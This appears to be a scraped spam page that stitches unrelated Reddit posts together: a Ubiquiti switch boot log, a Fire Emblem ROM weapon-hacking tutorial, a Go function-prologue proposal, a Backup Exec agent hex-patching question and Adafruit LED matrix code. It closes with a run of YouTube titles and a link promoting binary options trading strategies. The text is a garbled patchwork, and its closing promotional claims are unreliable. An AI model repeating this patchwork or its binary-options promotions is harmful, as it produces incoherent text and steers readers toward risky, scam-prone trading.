iproc_gtimer [ 0.080000] NET: Registered protocol family 2 [ 0.090000] TCP established hash table entries: 4096 (order: 3, 32768 bytes) [ 0.090000] TCP bind hash table entries: 4096 (order: 3, 32768 bytes) [ 0.090000] TCP: Hash tables configured (established 4096 bind 4096) [ 0.090000] TCP: reno registered [ 0.090000] UDP hash table entries: 128 (order: 0, 4096 bytes) [ 0.090000] UDP-Lite hash table entries: 128 (order: 0, 4096 bytes) [ 0.090000] NET: Registered protocol family 1 [ 14.240000] pm_init: Initializing Power Management .... [ 14.240000] iproc gpiochip add GPIOA [ 14.240000] GPIOA:ioaddr f0000060 [ 14.240000] GPIOA:intr_ioaddr f0000000 dmu_ioaddr (null) [ 14.490000] PCIE0: LINKSTA reg 0xbe val 0x1001 [ 14.490000] reg[0xac]=0x10, reg[0xae]=0x42, reg[0xb0]=0x8000, reg[0xb4]=0x2c10, reg[0xb6]=0x10, reg[0xb8]=0x5c12, reg[0xba]=0x65, reg[0xbe]=0x1001, reg[0xc6]=0x40, reg[0xca]=0x1, reg[0xd0]=0x1f, reg[0xd2]=0x8, reg[0xdc]=0x2, PCIE0 link=0 [ 14.840000] PCIe port 1 in End-Point mode - ignored [ 14.840000] Registering iproc_pmu_device [ 14.840000] bounce pool size: 64 pages [ 14.850000] squashfs: version 4.0 (2009/01/31) Phillip Lougher [ 14.850000] jffs2: version 2.2. (NAND) © 2001-2006 Red Hat, Inc. [ 14.860000] msgmni has been set to 223 [ 14.860000] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 254) [ 14.860000] io scheduler noop registered [ 14.860000] io scheduler deadline registered (default) [ 14.860000] io scheduler cfq registered [ 14.860000] Serial: 8250/16550 driver, 2 ports, IRQ sharing enabled [ 14.860000] serial8250.0: ttyS0 at MMIO 0x18000400 (irq = 123) is a 16550A [ 15.310000] console [ttyS0] enabled [ 15.310000] serial8250.0: ttyS1 at MMIO 0x18000300 (irq = 123) is a 16550A [ 15.340000] brd: module loaded [ 15.350000] loop: module loaded [ 15.360000] nbd: registered device at major 43 [ 15.380000] tun: Universal TUN/TAP device driver, 1.6 [ 15.390000] tun: (C) 1999-2004 Max Krasnyansky [email protected] [ 15.400000] TCP: cubic registered [ 15.400000] NET: Registered protocol family 10 [ 15.410000] sit: IPv6 over IPv4 tunneling driver [ 15.420000] NET: Registered protocol family 17 [ 15.420000] 8021q: 802.1Q VLAN Support v1.8 [ 15.430000] GENPLL[5] mdiv=40 rate=2000000000 [ 15.430000] qspi_iproc qspi_iproc.1: 1-lane output, 3-byte address [ 15.440000] m25p80 spi1.0: found mx25l25635e, expected m25p80 [ 15.450000] m25p80 spi1.0: mx25l25635e (32768 Kbytes) [ 15.450000] 7 cmdlinepart partitions found on MTD device spi1.0 [ 15.460000] Creating 7 MTD partitions on "spi1.0": [ 15.460000] 0x000000000000-0x0000000c0000 : "u-boot" [ 15.470000] 0x0000000c0000-0x0000000d0000 : "u-boot-env" [ 15.480000] 0x0000000d0000-0x0000000e0000 : "shmoo" [ 15.480000] 0x0000000e0000-0x000000fe0000 : "kernel0" [ 15.490000] 0x000000fe0000-0x000001ef0000 : "kernel1" [ 15.500000] 0x000001ef0000-0x000001ff0000 : "cfg" [ 15.510000] 0x000001ff0000-0x000002000000 : "EEPROM" [ 15.540000] Freeing init memory: 11024K [ 15.580000] ubnthal: module license 'Proprietary' taints kernel. [ 15.580000] Disabling lock debugging due to kernel taint [ 15.650000] gpiodev: reset_timeout=3 ...running /sbin/init init started: BusyBox v1.19.4 (2017-03-22 15:14:07 PDT) /bin/watchdog: invalid option -- m BusyBox v1.19.4 (2017-03-22 15:14:07 PDT) multi-call binary.
Usage: watchdog [-t N[ms]] [-T N[ms]] [-F] DEV
Periodically write to watchdog device DEV
 -T N Reboot after N seconds if not reset (default 60) -t N Reset every N seconds (default 30) -F Run in foreground 
Use 500ms to specify period in milliseconds
  • exec Restoring EEPROM data from ubnthal MAC: f0:9f:c2:0c:2c:a9 SyncDB Running... Validating the active image /dev/mtd4..."3.7.51.6230" Validating the backup image /dev/mtd3..."3.3.1.3458" DMA pool size: 4194304 AXI unit 0: Dev 0x8344, Rev 0x01, Chip BCM53344_A0, Driver BCM56150_A0 In hpcHardwareInit:236, could not find the board
    Configurator did not initialized... exiting
Reference platform resetting ... + exec The system is going down NOW! Sent SIGTERM to all processes Sent SIGKILL to all processes Requesting system reboot [ 35.980000] Disabling non-boot CPUs ... [ 35.980000] Restarting system.
Any Ideas? Is there a way to tftp boot these? The only documentation I found was for AP's.
submitted by pkroupa to Ubiquiti [link] [comments]

[Hacking Tutorial] Modifying Existing Weapons

It's been a while since I had one of these, but we're going to go through modifying weapons and adding custom ones. There's some new concepts in here for adding new items, so we're going to start simple with modifying existing weapons.
Things you'll need:
With that, let's get started. The first thing we're going to do is simple: modify stats of existing weapons.
  1. Open up Nightmare and open up the ROM and load up the Item Editor for your game (I assume you went through the other tutorials, so I won't have too many pictures for things covered earlier). You should see something like this for FE6.
  2. Things should be looking pretty obvious right now, so let's choose a weapon to modify. Let's just do Iron Lance, since that's easy to test. So go ahead and find Iron Lance in the list.
  3. Once you select it, all of the fields below will update with data for that item. Most things should be pretty straightforward, and modifying them should be pretty straightforward as well, but let's just go over them really quick.
  1. Whew, so let's just modify our Iron Lance already. We're going to modify it so that it looks like this. Yeah, it's OP.
  2. So let's check it out in game. Pssh. Yeah, "ordinary spear" my ass. Let's try it out, shall we?. I'm not sure I would have expected any different. Also, I'm pretty sure that's the Divinestone buff.
  3. So, there you go. How to break Fire Emblem 6 over your knee with an ordinary spear.
So I did mention you could do all of this without Nightmare as well. You should stop reading here if you want to keep your brain intact. I take no responsibility for massive confusion if you read on.
Here's your cheat sheet for doing it without Nightmare. You have to know where the weapon data lives in the ROM. You see, that nightmare module (nmm file) is actually human readable if you open it in a text editor. If you open up FE6's item editor, you'll find this:
FE6 Item Editor by SpyroDi, modified by Arch
0x60B648
128
32
FE6 Item Editor.txt
NULL
You can take a guess what that address I bolded there is. If you jump to that address in the hex, you'll find the start of weapon data. Each block for an item is 0x20 bytes (32 bytes, which corresponds to the other info in the module). Remember Iron Lance's ID? It was 0x10. That means it's the 16th item in the block. so if you do 16 x 32, you'll get 512, which is 0x200. If you jump to 0x60B648 + 0x200 (which is 0x60B848), you'll find your Iron Lance. So let's jump to it in our modified file.
What you'll see at that offset and the next 32 bytes for it is:
39 07 BE 05 00 00 10 01 21 01 00 00 B0 27 66 08 00 00 00 00 63 19 64 01 23 11 08 00 01 0F 00 00
Sweet jesus, what the fuck is this? Well, if you look closely and look at what we found earlier for Iron Lance, all of those values do actually match up. Remember the item name? The value there was 0739 in Nightmare. Remembering that GBA uses little endian, that corresponds to the first 2 bytes. The next two are the item description (which was 05BE in nightmare). The next two are the item description, which was blank (0000). Followed by the ID (0x10), weapon type (1 for spear), weapon ability 1 (0x20 is the brave effect, and 0x01 is the weapon trait, combine them together for 0x21), weapon ability 2 (0x01 is Reversing weapon triangle), 2 blank bytes (you'll see how we get this later), stat bonuses pointer (again, written in little endian order (we typed in 86627B0 earlier)), effectiveness pointer (which was nil, so 00000000), then durability (which was 99, or 0x63 in hex) and so on. Note that cost per use in this case is 2 bytes (since it could exceed 255, theoretically).
Note that this format is different across games, so you may have to figure out what you're modifying, but the general order is roughly the same. In fact, the nightmare module also tells you this information of what the bytes mean (including blank bytes from above) if you parse through it. Here's a sample from FE7's item editor nightmare module:
FE7 Item Editor by SpyroDi, updated by Nintenlord
0xBE222c Where the item data starts
159 How many items we have
36 The size of each item
FE7 Item Editor.txt
NULL
Item Name Pointer
0 The offset for the item name (i.e. how many bytes to skip from the beginning)
2 The number of bytes taken up by this field (i.e. how many bytes to read)
NEHU
NULL
The bold bits are mine.
Finally, what if you don't know the ID? Alongside the nightmare module for the item editor is also an Item List.txt file that holds the list of all IDs for all items. You can look it up there as well.
Just to prove this works, we're going to modify our weapon back to more reasonable levels. We'll remove the Divinestone buff and bring it down to more reasonable levels. The changes I made look like this in HxD, and you should be able to decipher what my values are going to be.
I changed the Iron Lance to this string of hex:
39 07 BE 05 00 00 10 01 21 01 00 00 00 00 00 00 00 00 00 00 3C 04 64 08 0A 11 08 00 01 0F 00 00
Take a moment and see if you can figure out what I changed it to. I bolded the changes. See if you're right here. It still breaks the game, but at least it breaks it more reasonably.
Believe it or not, this is the easy stuff. Making your own weapons? That shit is a lot more complicated, but if you know this, it'll make things a lot easier.
submitted by OtakuReborn to fireemblem [link] [comments]

Reducing the function prologue size

Right now, the Go compiler inserts the following prologue into every function to check if the Go routine ran out of stack:
somefunction: mov %fs:-8,%rcx # fetch TLS pointer lea -amount(%rsp),%rax # optionally compute stack frame size cmp 0x10(%rcx),%rax # do we need more stack? jbe .Lmorestack ... # actual code here ... .Lmorestack: call runtime.morestack_noctxt # get more stack jmp somefunction # try again 
This prologue has a size of 34 bytes (less if no stack space is needed). That's a lot of space wasted for each function.
I have an idea how to reduce the size of this boilerplate code: First, instead of putting the stack limit into the structure pointed to by %fs:-8, it could be placed directly in the TLS segment. Then we can check if we need more stack like this:
somefunction: lea -amount(%rsp),%rax # compute stack frame size cmp %fs:stacklimit,%rax 
This saves four bytes and one load, making each function call a tiny bit faster in the process. It's not a huge size improvement, I estimate binaries would shrink by about 0.5% with this change.
Really though, if the linker would shuffle around code bits so jump targets (especially that frame code) are near the jump instructions, that would save another 7 bytes in the boilerplate code.
submitted by FUZxxl to golang [link] [comments]

Help with Backup Exec 2012 Ralus Linux agent

Hey guys,
I was hoping someone could help me, im running Ubuntu 12 with linux kernal 3.13 and i have a windows server 2008 R2 which has Symantic Backup Exec 2012 running on it. That backup exec's linux agents(called Ralus) is incompatible with linux kernal 3.x and im trying to find a work around until we replace shitty backup exec :D
The problem and solution is described in this old blog post: http://web.archive.org/web/20140417140141/http://blog.redweb.at/2012/08/howto-backupexec-2012-linux-agent-and-kernel-3-0-debian
however the issue im having is the error "GetIfAddrs(LINUX): failed err = 11" and the solution described isnt working for me, the line im trying to find "2363e: 79 19 jns 23659 <_z10getifaddrspp7ifaddrs +0xb9>" using the command ‘objdump -D libbesocket.so > libbesocket.asm’ to disassemble the binary. (and various other search terms in the comments)
My problem is i need to change a specific 79 to 78 to skip over the error caused by the kernel incompatibility but the lines i found dont have the 79 in them.
These are the lines from objdump:
1f5ba: 68 38 89 00 00 push $0x8938 1f5bf: ff b5 5c ff ff ff pushl -0xa4(%ebp) 1f5c5: e8 4e e6 fe ff call dc18  1f5ca: 83 c4 10 add $0x10,%esp 1f5cd: 85 c0 test %eax,%eax 1f5cf: 0f 88 47 06 00 00 js 1fc1c <_Z10getifaddrsPP7ifaddrs+$ 1f5d5: 8b 75 84 mov -0x7c(%ebp),%esi 
The line from hexer:
00007a40: 5a 31 30 67 65 74 69 66 61 64 64 72 73 50 50 37 Z10getifaddrsPP7 
Ive been working on this for the past 2.5days and i just cant get my head around the hex, im only barely understanding what im looking at.. :/ the only other option for me is to patch the kernel but... yeah everything would probably break if i did that :(
submitted by Tech_Adam to linuxadmin [link] [comments]

Adafruit Space Invader pendant. Want to convert to using a bicolor 1.2 led matrix. How would the code change?

 // Trinket/Gemma + LED matrix backpack jewelry. Plays animated // sequence on LED matrix. Press reset button to display again, // or add optional momentary button between pin #1 and +V. // THERE IS NO ANIMATION DATA IN THIS SOURCE FILE, you should // rarely need to change anything here. EDIT anim.h INSTEAD. #define BRIGHTNESS 14 // 0=min, 15=max #define I2C_ADDR 0x70 // Edit if backpack A0/A1 jumpers set #include  #include  #include  #include "anim2.h" // Animation data is located here #include "anim3.h" // Animation data is located here #include "anim4.h" // Animation data is located here static const uint8_t PROGMEM reorder[] = { // Column-reordering table 0x00,0x40,0x20,0x60,0x10,0x50,0x30,0x70,0x08,0x48,0x28,0x68,0x18,0x58,0x38,0x78, 0x04,0x44,0x24,0x64,0x14,0x54,0x34,0x74,0x0c,0x4c,0x2c,0x6c,0x1c,0x5c,0x3c,0x7c, 0x02,0x42,0x22,0x62,0x12,0x52,0x32,0x72,0x0a,0x4a,0x2a,0x6a,0x1a,0x5a,0x3a,0x7a, 0x06,0x46,0x26,0x66,0x16,0x56,0x36,0x76,0x0e,0x4e,0x2e,0x6e,0x1e,0x5e,0x3e,0x7e, 0x01,0x41,0x21,0x61,0x11,0x51,0x31,0x71,0x09,0x49,0x29,0x69,0x19,0x59,0x39,0x79, 0x05,0x45,0x25,0x65,0x15,0x55,0x35,0x75,0x0d,0x4d,0x2d,0x6d,0x1d,0x5d,0x3d,0x7d, 0x03,0x43,0x23,0x63,0x13,0x53,0x33,0x73,0x0b,0x4b,0x2b,0x6b,0x1b,0x5b,0x3b,0x7b, 0x07,0x47,0x27,0x67,0x17,0x57,0x37,0x77,0x0f,0x4f,0x2f,0x6f,0x1f,0x5f,0x3f,0x7f, 0x80,0xc0,0xa0,0xe0,0x90,0xd0,0xb0,0xf0,0x88,0xc8,0xa8,0xe8,0x98,0xd8,0xb8,0xf8, 0x84,0xc4,0xa4,0xe4,0x94,0xd4,0xb4,0xf4,0x8c,0xcc,0xac,0xec,0x9c,0xdc,0xbc,0xfc, 0x82,0xc2,0xa2,0xe2,0x92,0xd2,0xb2,0xf2,0x8a,0xca,0xaa,0xea,0x9a,0xda,0xba,0xfa, 0x86,0xc6,0xa6,0xe6,0x96,0xd6,0xb6,0xf6,0x8e,0xce,0xae,0xee,0x9e,0xde,0xbe,0xfe, 0x81,0xc1,0xa1,0xe1,0x91,0xd1,0xb1,0xf1,0x89,0xc9,0xa9,0xe9,0x99,0xd9,0xb9,0xf9, 0x85,0xc5,0xa5,0xe5,0x95,0xd5,0xb5,0xf5,0x8d,0xcd,0xad,0xed,0x9d,0xdd,0xbd,0xfd, 0x83,0xc3,0xa3,0xe3,0x93,0xd3,0xb3,0xf3,0x8b,0xcb,0xab,0xeb,0x9b,0xdb,0xbb,0xfb, 0x87,0xc7,0xa7,0xe7,0x97,0xd7,0xb7,0xf7,0x8f,0xcf,0xaf,0xef,0x9f,0xdf,0xbf,0xff }; int animationSection = 0; void ledCmd(uint8_t x) { // Issue command to LED backback driver Wire.beginTransmission(I2C_ADDR); Wire.write(x); Wire.endTransmission(); } void clear(void) { // Clear display buffer Wire.beginTransmission(I2C_ADDR); for(uint8_t i=0; i<17; i++) Wire.write(0); Wire.endTransmission(); } void setup() { power_timer1_disable(); // Disable unused peripherals power_adc_disable(); // to save power PCMSK |= _BV(PCINT1); // Set change mask for pin 1 Wire.begin(); // I2C init clear(); // Blank display ledCmd(0x21); // Turn on oscillator ledCmd(0xE0 | BRIGHTNESS); // Set brightness ledCmd(0x81); // Display on, no blink } uint8_t rep = REPS; void loop() { switch (animationSection) { case 0: for(int i=0; i 10) { animationSection = 0; } if(!--rep) { // If last cycle... ledCmd(0x20); // LED matrix in standby mode // GIMSK = _BV(PCIE); // Enable pin change interrupt // power_all_disable(); // All peripherals off // set_sleep_mode(SLEEP_MODE_PWR_DOWN); // sleep_enable(); // sei(); // Keep interrupts disabled // sleep_mode(); // Power down CPU (pin 1 will wake) // Execution resumes here on wake. // PLD - Simply Sleep for 2 minutes then start again... //delay(100000); //delay(100000); delay(120000); animationSection = 0; GIMSK = 0; // Disable pin change interrupt rep = REPS; // Reset animation counter power_timer0_enable(); // Re-enable timer power_usi_enable(); // Re-enable USI Wire.begin(); // Re-init I2C clear(); // Blank display ledCmd(0x21); // Re-enable matrix } } ISR(PCINT0_vect) {} // Button tap 
This is a section of the anim file. I want to be able to set the various colors in these "frames"
// Animation data for Trinket/Gemma + LED matrix backpack jewelry. // Edit this file to change the animation; it's unlikely you'll need // to edit the source code. #define REPS 10 // Number of times to repeat the animation loop (1-255) const int frameSpeed2 = 3; const uint8_t PROGMEM anim2[] = { // Animation bitmaps. Each frame of animation MUST contain // 8 lines of graphics data (there is no error checking for // length). Each line should be prefixed with the letter 'B', // followed by exactly 8 binary digits (0 or 1), no more, // no less (again, no error checking). '0' represents an // 'off' pixel, '1' an 'on' pixel. End line with a comma. B00000000, B00000000, B00000000, B00000000, B00000000, B00000000, B00000000, B00000000, frameSpeed2, // 0.10 seconds }; 
submitted by pldiguanaman to arduino [link] [comments]

Binary Options Strategy - YouTube C Programming Tutorial 39, Hexadecimal Number System FIX WIFI NVRAM WARNING Err = 0x10 How to read Pressure of a candle in binary option - YouTube Binary options Volatility 10 Index: Make 15% every 5-10 ... NVRAM ERROR- COMO CORRIGIR O WIFI START TRADING BINARY OPTIONS WITH BINARY OPTIONS LOW ...

Read And Write Function In C Binary Options. A+ – Opens a file for read and write mode and sets pointer to the first character in the file. Each of the three permissions read and write function in c binary options is represented by one of the bits in the binary equivalent of the decimal number. The next hexadecimal value after 0xF is 0x10. They are also called. Jul 29, 2020 · Supply demand ... Wednesday, October 19, 2016. 0x10 Binêre Opsies The binary numeral system uses the number 2 as its base (radix). As a base-2 numeral system, it consists of only two numbers: 0 and 1. While it has been applied in ancient Egypt, China and India for different purposes, the binary system has become the language of electronics and computers in the modern world. This is the most efficient system to detect an electric signal’s off (0) and on (1 ... 0x10 Opções Binárias June 09, 2017 - 0x01 fsbl1 Binary mmc0 0x00004400 fsbl.stm32 - 0x02 fsbl2 Binary mmc0 0x00044400 fsbl.stm32 P 0x03 ssbl Binary mmc0 0x00084400 ssbl.stm32 - 0x10 bootfs System mmc0 0x00284400 bootfs.ext4 - 0x11 rootfs FileSystem mmc0 0x08284400 rootfs.ext4 - 0x12 userfs FileSystem mmc0 0x28284400 userfs.ext4 To delete only one partition, add the DE option on the corresponding line. To delete ssbl partition ... 0x10 Binary Options Get link; Facebook; Twitter; Pinterest; Email; Other Apps; October 15, 2017 Binary exploitation - AIS3 1. Linux Binary Exploitation Angelboy @ AIS3 2017 1 2. About me • Angelboy • CTF player • WCTF / Boston Key Party 1st • DEFCON / HITB 2nd • Chroot / HITCON / 217 • Blog • blog.angelboy.tw 2 Convert between Binary, Decimal, Hex and Octal fast and easy. Our simple converter helps you calculate the value you need. Just type your number in the field, and the conversion is done immidiately. You can convert from and to all supported numeral systems - Binary, Octal, Decimal and Hexadecimal Any indexes related to the constraint are also replicated, even if options 0x10 and 0x40 are not enabled.'), (0x8000, 'This option is not valid for SQL Server 2005 Publishers.'), (0x10000, 'Replicates CHECK constraints as NOT FOR REPLICATION so that the constraints are not enforced during synchronization.'), (0x20000, 'Replicates FOREIGN KEY constraints as NOT FOR REPLICATION so that the ... Maybe a bit OT, but if you need this only for debuging to understand or retrace some binary operations you are doing, you might take a look on wcalc (a simple console calculator). With the -b options you get binary output. e.g. $ wcalc -b "(256 3) & 0xff" = 0b11

[index] [10229] [18969] [23273] [24118] [5273] [22027] [19092] [6463] [22428] [4231]

Binary Options Strategy - YouTube

How to Fix NVRAM WARNING err=0x10 on android under 5 minutes without pc. For ROOTED MTK DEVICES ONLY - Duration: 4:07. Kiran Kumar 10,486 views This is a working strategy of Deriv(binary.com) platform. You will need some patient with this strategy and make sure the moving line move to the bottom whil... Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42. ... Cara mengatasi Wifi NVRAM WARNING Err 0x10 Di Xiaomi note 3g - Duration: 7:44. Meigha yunita manuputy ... I Do Not Own Copyrights To Music! In today’s video I will be showing you guys A super easy 4 step profitable binary options strategy. It works for Forex Trad... World's Most Famous Hacker Kevin Mitnick & KnowBe4's Stu Sjouwerman Opening Keynote - Duration: 36:30. Cyber Investing Summit Recommended for you #trusted_binary; #binary_option; #binary_trade; #iq_option; #trade; Binary Option trading all sure shoot technique and strategy by TRUSTED BINARY . Making mo... https://tradebnryoptions.com Invest in binary options trading starting with a binary options low minimum deposit! Best Binary Options Brokers 2019 Reviews!

http://arab-binary-option.wertfomuglecusu.tk